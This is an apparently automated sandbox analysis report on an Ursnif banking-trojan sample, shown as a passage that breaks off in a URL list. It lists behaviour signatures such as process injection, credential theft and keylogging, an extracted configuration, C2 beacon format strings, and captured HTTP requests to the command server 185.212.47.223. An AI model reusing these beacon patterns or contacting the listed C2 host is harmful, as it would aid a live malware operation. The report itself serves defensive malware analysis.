Analysis Report https___purefile24.top_4352wedfoifom.php

Overview

General Information

Sample Name: https___purefile24.top_4352wedfoifom.php (renamed file extension from php to dll)
Analysis ID: 322850
MD5: e221c9a4b1ac13310d037cbc764b86d9
SHA1: a7dbb7283b3b164993c1c122189e42509fe5573d
SHA256: 6b1e27915fa85d6bde40c512865e57c555e7bb02f1dc192a9b827c74c8984780
Tags: php

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Contains VNC / remote desktop functionality (version string found)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

AV Detection:

Found malware configuration
Source: explorer.exe.3424.30.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@computer", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "dns": "610930", "version": "250166", "uptime": "406", "crc": "59998e77", "id": "7657", "user": "4229768108f8d2d8cdc8873a875bc46d", "soft": "1"}
Multi AV Scanner detection for submitted file
Source: https___purefile24.top_4352wedfoifom.dll ReversingLabs: Detection: 14%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.1110000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.loaddll32.exe.1100000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_026742B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_026742B4

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: loaddll32.exe, 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: unknown TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: global traffic HTTP traffic detected: GET /images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F_2FU7Uq7_/2BsmFnH4ELlf_2BlJ/qvasTVtPc160/_2BGCa7BwG5/XiEDVuUR_2F0Zg/IWoXtyylgdv18ab31_2FU/yx4rgH_2FURRWUyZ/6gUwgFPsNHdjJYY/OP6LVL9vnpF_2FlR6l/FN80SaQZn/t.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITzmt7sSfSh7DfV8J5Sxs/gsPHQP3GI_2BpFcc/vziIw2uQsRSR2n2/peUDHwQ_2F4Kfd6S1d/5UOnL_2Fv/D83izP4rn_2FwQF9Mfeb/peI8RVGRl9HSt3GBrUm/VAt7e_2BvseRDA8bUBljnL/FhJZ.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0PJdZLTevz9jDLo/EMOcQewMIfz4VuFqodI_2F/M9qdb_2Bkkl9s/3_2FgKSe/HJi5LdFtwmWIaSXCvsyiPML/FIA7MqSfSN/cKd_2BVdiqq56nM6h/Pk9LghTopeqR/aynzZ8A4QuFKH4X/uVs.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown DNS traffic detected: queries for: resolver1.opendns.com
Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000003.872503018.000000000DC64000.00000004.00000040.sdmp String found in binary or memory: http://185.212.47.223/favicon.ico
Source: explorer.exe, 0000001E.00000003.872503018.000000000DC64000.00000004.00000040.sdmp String found in binary or memory: http://185.212.47.223/images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F
Source: explorer.exe, 0000001E.00000003.873444020.000000000DC9A000.00000004.00000040.sdmp, explorer.exe, 0000001E.00000000.846213783.000000000A863000.00000004.00000001.sdmp String found in binary or memory: http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/IT
Source: RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp String found in binary or memory: http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/
Source: explorer.exe, 0000001E.00000000.846213783.000000000A863000.00000004.00000001.sdmp String found in binary or memory: http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000018.00000002.858092350.000001D7ABCB7000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000025.00000003.881569101.0000000004A79000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoftjX
Source: WerFault.exe, 00000025.00000003.881569101.0000000004A79000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoftjX2E
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
